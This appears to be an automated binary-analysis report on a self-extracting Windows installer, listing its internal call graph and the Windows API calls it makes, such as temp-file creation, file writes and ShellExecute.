lstrcmpW 9656->9665 9658 407674 23 API calls 9658->9665 9659 407613 23 API calls 9659->9665 9660 403b40 2 API calls 9660->9665 9661 401f9d 19 API calls 9661->9665 9662 407776 55 API calls 9662->9665 9663 403f48 4 API calls 9663->9665 9664 4073d1 21 API calls 9664->9665 9665->9653 9665->9654 9665->9655 9665->9656 9665->9658 9665->9659 9665->9660 9665->9661 9665->9662 9665->9663 9665->9664 9666 407717 25 API calls 9665->9666 9667 4073d1 21 API calls 9665->9667 10428 40744b 9665->10428 9666->9665 9668 408476 ??3@YAXPAX 9667->9668 9668->9665 9670 40243b lstrcmpW 9669->9670 9671 4082fd 9670->9671 9672 40830b 9671->9672 10432 4019f0 GetStdHandle WriteFile 9671->10432 9674 40831e 9672->9674 10433 4019f0 GetStdHandle WriteFile 9672->10433 9676 408333 9674->9676 10434 4019f0 GetStdHandle WriteFile 9674->10434 9678 408344 9676->9678 10435 4019f0 GetStdHandle WriteFile 9676->10435 9680 40243b lstrcmpW 9678->9680 9681 408351 9680->9681 9684 40835f 9681->9684 10436 4019f0 GetStdHandle WriteFile 9681->10436 9683 40243b lstrcmpW 9685 40836c 9683->9685 9684->9683 9686 40837a 9685->9686 10437 4019f0 GetStdHandle WriteFile 9685->10437 9688 40243b lstrcmpW 9686->9688 9689 408387 9688->9689 9690 408395 9689->9690 10438 4019f0 GetStdHandle WriteFile 9689->10438 9692 40243b lstrcmpW 9690->9692 9693 4083a2 9692->9693 9694 4083b2 9693->9694 10439 4019f0 GetStdHandle WriteFile 9693->10439 9694->9180 9697 407636 9696->9697 9698 407658 9697->9698 9699 40764b 9697->9699 10443 407186 9698->10443 10440 407154 9699->10440 9702 407653 9703 4073d1 21 API calls 9702->9703 9704 407671 9703->9704 9704->9222 9706 407689 9705->9706 9707 40716d 2 API calls 9706->9707 9708 407694 9707->9708 9709 4073d1 21 API calls 9708->9709 9710 4076a5 9709->9710 9710->9222 9712 401411 2 API calls 9711->9712 9713 403f96 9712->9713 9714 402535 2 API calls 9713->9714 9715 403f9f GetTempPathW 9714->9715 9716 403fb8 9715->9716 9721 403fcf 9715->9721 9717 402535 2 API calls 9716->9717 9718 403fc3 GetTempPathW 9717->9718 9718->9721 9719 402535 2 API calls 9720 403ff2 wsprintfW 9719->9720 9720->9721 9721->9719 9722 404009 GetFileAttributesW 9721->9722 9723 40402d 9721->9723 9722->9721 9722->9723 9723->9207 9725 40787e 9724->9725 10449 40719f 9725->10449 9728 4073d1 21 API calls 9729 4078b3 9728->9729 9729->9225 9731 403e21 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9730->9731 9732 403e16 9730->9732 9731->9226 9733 402c86 16 API calls 9732->9733 9733->9731 9735 40243b lstrcmpW 9734->9735 9736 40455d 9735->9736 9737 404592 9736->9737 9738 401329 2 API calls 9736->9738 9737->9277 9739 40456c 9738->9739 9740 403b7f 19 API calls 9739->9740 9741 404572 9740->9741 9741->9737 9742 401429 2 API calls 9741->9742 9742->9737 9744 4012f7 2 API calls 9743->9744 9745 4043d4 9744->9745 9746 40254d 2 API calls 9745->9746 9747 4043df 9746->9747 9747->9266 9749 4021a9 9748->9749 9750 40218e LoadLibraryA GetProcAddress 9748->9750 9749->9323 9750->9749 9752 401411 2 API calls 9751->9752 9759 4048bc 9752->9759 9753 401329 2 API calls 9753->9759 9754 40494e 9755 404988 ??3@YAXPAX 9754->9755 9757 4048ab 3 API calls 9754->9757 9755->9276 9756 401429 2 API calls 9756->9759 9758 404985 9757->9758 9758->9755 9759->9753 9759->9754 9759->9756 9760 40243b lstrcmpW 9759->9760 9760->9759 9762 40661a 2 API calls 9761->9762 9763 403f50 9762->9763 9764 401411 2 API calls 9763->9764 9765 403f5e 9764->9765 9765->9251 9767 404cb1 ??3@YAXPAX 9766->9767 9769 404b15 9766->9769 9770 404cb7 9767->9770 9768 404b29 GetDriveTypeW 9768->9767 9771 404b55 9768->9771 9769->9767 9769->9768 9770->9236 9772 403f85 6 API calls 9771->9772 9773 404b63 CreateFileW 9772->9773 9774 404b89 9773->9774 9775 404c7b ??3@YAXPAX ??3@YAXPAX 9773->9775 9776 401411 2 API calls 9774->9776 9775->9770 9777 404b92 9776->9777 9778 401329 2 API calls 9777->9778 9779 404b9f 9778->9779 9780 40254d 2 API calls 9779->9780 9781 404bad 9780->9781 9782 4013e2 2 API calls 9781->9782 9783 404bb9 9782->9783 9784 40254d 2 API calls 9783->9784 9785 404bc7 9784->9785 9786 40254d 2 API calls 9785->9786 9787 404bd4 9786->9787 9788 4013e2 2 API calls 9787->9788 9789 404be0 9788->9789 9790 40254d 2 API calls 9789->9790 9791 404bed 9790->9791 9792 40254d 2 API calls 9791->9792 9793 404bf6 9792->9793 9794 4013e2 2 API calls 9793->9794 9795 404c02 9794->9795 9796 40254d 2 API calls 9795->9796 9797 404c0b 9796->9797 9798 402776 3 API calls 9797->9798 9799 404c1d WriteFile ??3@YAXPAX CloseHandle 9798->9799 9800 404c4b 9799->9800 9801 404c8c 9799->9801 9800->9801 9802 404c53 SetFileAttributesW ShellExecuteW ??3@YAXPAX 9800->9802 9803 402c86 16 API calls 9801->9803 9802->9775 9804 404c94 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9803->9804 9804->9770 9814 4022b0 9805->9814 9809 401411 2 API calls 9808->9809 9810 40273a 9809->9810 9811 402772 9810->9811 9812 402535 2 API calls 9810->9812 9811->9364 9813 402757 MultiByteToWideChar 9812->9813 9813->9811 9815 4022ea 9814->9815 9816 4022be ??2@YAPAXI 9814->9816 9815->9364 9816->9815 9818 4022cf 9816->9818 9817 4022e2 ??3@YAXPAX 9817->9815 9818->9817 9818->9818 9820 401ae3 9819->9820 9821 401a97 9819->9821 9820->9373 9821->9820 9822 401abc CharUpperW CharUpperW 9821->9822 9822->9821 9823 401af3 CharUpperW CharUpperW 9822->9823 9823->9820 9824->9392 9826 403e9e 9825->9826 9827 4022b0 2 API calls 9826->9827 9828 403eac 9827->9828 9828->9406 9830 40435e 9829->9830 9831 404375 9830->9831 9832 40436a 9830->9832 9833 4025ae 2 API calls 9831->9833 9849 4025f6 9832->9849 9834 40437e 9833->9834 9836 4022b0 2 API calls 9834->9836 9838 404387 9836->9838 9837 404373 9841 403ec1 9837->9841 9838->9838 9839 4025f6 2 API calls 9838->9839 9840 4043b5 ??3@YAXPAX 9839->9840 9840->9837 9842 403ecd 9841->9842 9844 403ede 9841->9844 9843 4022b0 2 API calls 9842->9843 9843->9844 9844->9412 9846 403f06 9845->9846 9846->9846 9852 4022fc 9846->9852 9848 403f13 9848->9418 9850 4022b0 2 API calls 9849->9850 9851 402610 9850->9851 9851->9837 9853 402340 9852->9853 9854 402310 9852->9854 9853->9848 9855 4022b0 2 API calls 9854->9855 9855->9853 9857 4022fc 2 API calls 9856->9857 9858 40264a 9857->9858 9858->9428 9860 403d3d 9859->9860 9871 403c63 9860->9871 9864 403cd3 9863->9864 9865 403c63 _wtol 9864->9865 9866 403cf4 9865->9866 9866->9467 9868 403d04 9867->9868 9869 403c63 _wtol 9868->9869 9870 403d1c 9869->9870 9870->9472 9872 403c6d 9871->9872 9873 403c88 _wtol 9872->9873 9874 403cc1 9872->9874 9873->9872 9874->9461 9876 4023e8 9875->9876 9877 402411 9876->9877 9878 4023f4 lstrcmpW 9876->9878 9877->9182 9878->9876 9878->9877 9880 408679 9879->9880 9880->9509 9882 40b30d 9881->9882 9886 40dcfb 3 API calls 9882->9886 9883 40b321 9884 40b331 9883->9884 9927 40b163 9883->9927 9884->9512 9886->9883 9888 40a7fe 9887->9888 9889 40b2fc 11 API calls 9888->9889 9890 40a823 9889->9890 9891 40a845 9890->9891 9892 40a82c 9890->9892 9955 40cc59 _EH_prolog 9891->9955 9958 40a3fe 9892->9958 9904 40151e 9903->9904 9905 401329 2 API calls 9904->9905 9906 40152b 9905->9906 9907 401429 2 API calls 9906->9907 9908 401534 CreateThread 9907->9908 9909 401563 9908->9909 9910 401568 WaitForSingleObject 9908->9910 10379 40129c 9908->10379 9911 40786b 23 API calls 9909->9911 9912 401585 9910->9912 9913 4015b7 9910->9913 9911->9910 9916 4015a3 9912->9916 9919 401594 9912->9919 9914 4015b3 9913->9914 9915 4015bf GetExitCodeThread 9913->9915 9914->9523 9917 4015d6 9915->9917 9918 407776 55 API calls 9916->9918 9917->9914 9917->9919 9920 401605 SetLastError 9917->9920 9918->9914 9919->9914 9921 407776 55 API calls 9919->9921 9920->9919 9921->9914 9923 401411 2 API calls 9922->9923 9924 4042ab 9923->9924 9925 401411 2 API calls 9924->9925 9926 4042b7 9925->9926 9926->9518 9940 40f0b6 9927->9940 9929 40b192 9929->9884 9930 40b17e 9930->9929 9943 40adc3 9930->9943 9933 40b297 ??3@YAXPAX 9933->9929 9934 40b2a2 ??3@YAXPAX 9934->9929 9936 40b27a memmove 9937 40b1d9 9936->9937 9937->9933 9937->9934 9937->9936 9938 40b2ac memcpy 9937->9938 9939 40dcfb 3 API calls 9938->9939 9939->9934 9951 40f06b 9940->9951 9944 40add0 9943->9944 9945 40ae0d memcpy 9943->9945 9946 40add5 ??2@YAPAXI 9944->9946 9947 40adfb 9944->9947 9945->9937 9948 40adfd ??3@YAXPAX 9946->9948 9949 40ade5 memmove 9946->9949 9947->9948 9948->9945 9949->9948 9952 40f0af 9951->9952 9953 40f07d 9951->9953 9952->9930 9953->9952 9954 40dcc7 GetLastError 9953->9954 9954->9953 9966 40c9fc 9955->9966 10362 40a28e 9958->10362 9988 40a0bf 9966->9988 10111 40a030 9988->10111 10112 40e8da ctype 3 API calls 10111->10112 10113 40a039 10112->10113 10114 40e8da ctype 3 API calls 10113->10114 10115 40a041 10114->10115 10116 40e8da ctype 3 API calls 10115->10116 10117 40a049 10116->10117 10118 40e8da ctype 3 API calls 10117->10118 10119 40a051 10118->10119 10120 40e8da ctype 3 API calls 10119->10120 10121 40a059 10120->10121 10122 40e8da ctype 3 API calls 10121->10122 10123 40a061 10122->10123 10124 40e8da ctype 3 API calls 10123->10124 10125 40a06b 10124->10125 10126 40e8da ctype 3 API calls 10125->10126 10127 40a073 10126->10127 10128 40e8da ctype 3 API calls 10127->10128 10129 40a080 10128->10129 10130 40e8da ctype 3 API calls 10129->10130 10131 40a088 10130->10131 10132 40e8da ctype 3 API calls 10131->10132 10133 40a095 10132->10133 10134 40e8da ctype 3 API calls 10133->10134 10135 40a09d 10134->10135 10136 40e8da ctype 3 API calls 10135->10136 10137 40a0aa 10136->10137 10138 40e8da ctype 3 API calls 10137->10138 10139 40a0b2 10138->10139 10363 40e8da ctype 3 API calls 10362->10363 10364 40a29c 10363->10364 10380 4012a5 10379->10380 10381 4012b8 10379->10381 10380->10381 10382 4012a7 Sleep 10380->10382 10383 4012f1 10381->10383 10384 4012e3 EndDialog 10381->10384 10382->10380 10384->10383 10386 4021db 10385->10386 10386->9530 10388 4025ae 2 API calls 10387->10388 10389 402992 10388->10389 10390 4029be 10389->10390 10391 402640 2 API calls 10389->10391 10390->9599 10391->10389 10392->9599 10394 4029d2 10393->10394 10395 4029de 10393->10395 10412 4019f0 GetStdHandle WriteFile 10394->10412 10397 4025ae 2 API calls 10395->10397 10401 4029e8 10397->10401 10398 4029d9 10410 402425 ??3@YAXPAX ??3@YAXPAX 10398->10410 10399 402a13 10400 40272e 3 API calls 10399->10400 10402 402a25 10400->10402 10401->10399 10405 402640 2 API calls 10401->10405 10403 402a33 10402->10403 10404 402a47 10402->10404 10406 407776 55 API calls 10403->10406 10407 407776 55 API calls 10404->10407 10405->10401 10408 402a42 ??3@YAXPAX ??3@YAXPAX 10406->10408 10407->10408 10408->10398 10410->9596 10411->9585 10412->10398 10414 4012f7 2 API calls 10413->10414 10415 402676 10414->10415 10416 4012f7 2 API calls 10415->10416 10417 402682 10416->10417 10417->9617 10419 4025ae 2 API calls 10418->10419 10420 402785 10419->10420 10421 4027c1 10420->10421 10424 402628 10420->10424 10421->9644 10425 402634 10424->10425 10426 40263a WideCharToMultiByte 10424->10426 10427 4022b0 2 API calls 10425->10427 10426->10421 10427->10426 10429 407456 10428->10429 10430 40745b 10428->10430 10429->9665 10430->10429 10431 4073d1 21 API calls 10430->10431 10431->10429 10432->9672 10433->9674 10434->9676 10435->9678 10436->9684 10437->9686 10438->9690 10439->9694 10441 40661a 2 API calls 10440->10441 10442 40715c 10441->10442 10442->9702 10446 40716d 10443->10446 10447 40661a 2 API calls 10446->10447 10448 407175 10447->10448 10448->9702 10450 40661a 2 API calls 10449->10450 10451 4071a7 10450->10451 10451->9728 8032 40f3f1 8035 4024e7 8032->8035 8040 40245a 8035->8040 8038 4024f5 8039 4024f6 malloc 8041 40246a 8040->8041 8047 402466 8040->8047 8042 40247a GlobalMemoryStatusEx 8041->8042 8041->8047 8043 402488 8042->8043 8042->8047 8043->8047 8048 401f9d 8043->8048 8047->8038 8047->8039 8049 401fb4 8048->8049 8050 401fe5 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8049->8050 8051 401fdb 8049->8051 8052 402095 SetLastError 8050->8052 8053 40201d ??2@YAPAXI GetEnvironmentVariableW 8050->8053 8068 407717 8051->8068 8052->8051 8058 4020ac 8052->8058 8054 40204c GetLastError 8053->8054 8067 40207e ??3@YAXPAX 8053->8067 8055 402052 8054->8055 8054->8067 8061 402081 8055->8061 8062 40205c lstrcmpiW 8055->8062 8057 4020cb lstrlenA ??2@YAPAXI 8059 402136 MultiByteToWideChar 8057->8059 8060 4020fc GetLocaleInfoW 8057->8060 8058->8057 8075 401f47 8058->8075 8059->8051 8060->8059 8065 402123 _wtol 8060->8065 8061->8052 8066 40206b ??3@YAXPAX 8062->8066 8062->8067 8064 4020c1 8064->8057 8065->8059 8066->8061 8067->8061 8082 40661a 8068->8082 8071 40773c IsBadReadPtr 8073 40774e 8071->8073 8086 4073d1 8073->8086 8076 401f51 GetUserDefaultUILanguage 8075->8076 8077 401f95 8075->8077 8078 401f72 GetSystemDefaultUILanguage 8076->8078 8079 401f6e 8076->8079 8077->8064 8078->8077 8080 401f7e GetSystemDefaultLCID 8078->8080 8079->8064 8080->8077 8081 401f8e 8080->8081 8081->8077 8083 406643 8082->8083 8084 40666f IsWindow 8082->8084 8083->8084 8085 40664b GetSystemMetrics GetSystemMetrics 8083->8085 8084->8071 8084->8073 8085->8084 8087 4073e0 8086->8087 8088 407444 8086->8088 8087->8088 8098 4024fc 8087->8098 8088->8047 8090 4073f1 8091 4024fc 2 API calls 8090->8091 8092 4073fc 8091->8092 8102 403b7f 8092->8102 8095 403b7f 19 API calls 8096 40740e ??3@YAXPAX ??3@YAXPAX 8095->8096 8096->8088 8099 402513 8098->8099 8111 40112b 8099->8111 8101 40251e 8101->8090 8175 403880 8102->8175 8104 403b59 8116 40393b 8104->8116 8106 403b69 8139 4039f6 8106->8139 8108 403b74 8162 4027c7 8108->8162 8112 401177 8111->8112 8113 401139 ??2@YAPAXI 8111->8113 8112->8101 8113->8112 8115 40115a 8113->8115 8114 40116f ??3@YAXPAX 8114->8112 8115->8114 8115->8115 8198 401411 8116->8198 8120 403954 8205 40254d 8120->8205 8122 403961 8123 4024fc 2 API calls 8122->8123 8124 40396e 8123->8124 8209 403805 8124->8209 8127 401362 2 API calls 8128 403992 8127->8128 8129 40254d 2 API calls 8128->8129 8130 40399f 8129->8130 8131 4024fc 2 API calls 8130->8131 8132 4039ac 8131->8132 8133 403805 3 API calls 8132->8133 8134 4039bc ??3@YAXPAX 8133->8134 8135 4024fc 2 API calls 8134->8135 8136 4039d3 8135->8136 8137 403805 3 API calls 8136->8137 8138 4039e2 ??3@YAXPAX ??3@YAXPAX 8137->8138 8138->8106 8140 401411 2 API calls 8139->8140 8141 403a04 8140->8141 8142 401362 2 API calls 8141->8142 8143 403a0f 8142->8143 8144 40254d 2 API calls 8143->8144 8145 403a1c 8144->8145 8146 4024fc 2 API calls 8145->8146 8147 403a29 8146->8147 8148 403805 3 API calls 8147->8148 8149 403a39 ??3@YAXPAX 8148->8149 8150 401362 2 API calls 8149->8150 8151 403a4d 8150->8151 8152 40254d 2 API calls 8151->8152 8153 403a5a 8152->8153 8154 4024fc 2 API calls 8153->8154 8155 403a67 8154->8155 8156 403805 3 API calls 8155->8156 8157 403a77 ??3@YAXPAX 8156->8157 8158 4024fc 2 API calls 8157->8158 8159 403a8e 8158->8159 8160 403805 3 API calls 8159->8160 8161 403a9d ??3@YAXPAX ??3@YAXPAX 8160->8161 8161->8108 8163 401411 2 API calls 8162->8163 8164 4027d5 8163->8164 8165 4027e5 ExpandEnvironmentStringsW 8164->8165 8166 40112b 2 API calls 8164->8166 8167 402809 8165->8167 8168 4027fe ??3@YAXPAX 8165->8168 8166->8165 8234 402535 8167->8234 8169 402840 8168->8169 8169->8095 8172 402824 8173 401362 2 API calls 8172->8173 8174 402838 ??3@YAXPAX 8173->8174 8174->8169 8176 401411 2 API calls 8175->8176 8177 40388e 8176->8177 8178 401362 2 API calls 8177->8178 8179 403899 8178->8179 8180 40254d 2 API calls 8179->8180 8181 4038a6 8180->8181 8182 4024fc 2 API calls 8181->8182 8183 4038b3 8182->8183 8184 403805 3 API calls 8183->8184 8185 4038c3 ??3@YAXPAX 8184->8185 8186 401362 2 API calls 8185->8186 8187 4038d7 8186->8187 8188 40254d 2 API calls 8187->8188 8189 4038e4 8188->8189 8190 4024fc 2 API calls 8189->8190 8191 4038f1 8190->8191 8192 403805 3 API calls 8191->8192 8193 403901 ??3@YAXPAX 8192->8193 8194 4024fc 2 API calls 8193->8194 8195 403918 8194->8195 8196 403805 3 API calls 8195->8196 8197 403927 ??3@YAXPAX ??3@YAXPAX 8196->8197 8197->8104 8199 40112b 2 API calls 8198->8199 8200 401425 8199->8200 8201 401362 8200->8201 8202 40136e 8201->8202 8204 401380 8201->8204 8203 40112b 2 API calls 8202->8203 8203->8204 8204->8120 8206 40255a 8205->8206 8214 401398 8206->8214 8208 402565 8208->8122 8210 40381b 8209->8210 8211 403817 ??3@YAXPAX 8209->8211 8210->8211 8218 4026b1 8210->8218 8222 402f96 8210->8222 8211->8127 8215 4013dc 8214->8215 8216 4013ac 8214->8216 8215->8208 8217 40112b 2 API calls 8216->8217 8217->8215 8219 4026c7 8218->8219 8220 4026db 8219->8220 8226 402346 memmove 8219->8226 8220->8210 8223 402fa5 8222->8223 8225 402fbe 8223->8225 8227 4026e6 8223->8227 8225->8210 8226->8220 8228 4026f6 8227->8228 8229 401398 2 API calls 8228->8229 8230 402702 8229->8230 8233 402346 memmove 8230->8233 8232 40270f 8232->8225 8233->8232 8235 402541 8234->8235 8236 402547 ExpandEnvironmentStringsW 8234->8236 8237 40112b 2 API calls 8235->8237 8236->8172 8237->8236 11181 40e4f9 11182 40e516 11181->11182 11183 40e506 11181->11183 11186 40de46 11183->11186 11189 401b1f VirtualFree 11186->11189 11188 40de81 ??3@YAXPAX 11188->11182 11189->11188
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                                                                                    • Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                                                                                    • Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                                                                                    • Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                                                                                    • Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
                                                                                                                    • Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                                                                                    • Part of subcall function 00401B37: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                                                                                  • GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
                                                                                                                  • GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C
                                                                                                                    • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                                                                                    • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                                                                                    • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                                                                    • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                                                                                    • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
                                                                                                                    • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD
                                                                                                                  • _wtol.MSVCRT ref: 0040509F
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
                                                                                                                  • _wtol.MSVCRT ref: 00405217
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F
                                                                                                                    • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000028,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                                                                                    • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000028,004177C4,004177C4,00000000,00000028,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                                                                    • Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC
                                                                                                                    • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                                                                                    • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                                                                    • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                                                                    • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                                                                    • Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519
                                                                                                                    • Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569
                                                                                                                    • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
                                                                                                                    • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
                                                                                                                    • Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6
                                                                                                                  • wsprintfW.USER32 ref: 00405595
                                                                                                                  • _wtol.MSVCRT ref: 004057DE
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 004059E9
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
                                                                                                                  • GetKeyState.USER32(00000010), ref: 00405AA1
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
                                                                                                                  • memset.MSVCRT ref: 004060AE
                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 0040617E
                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
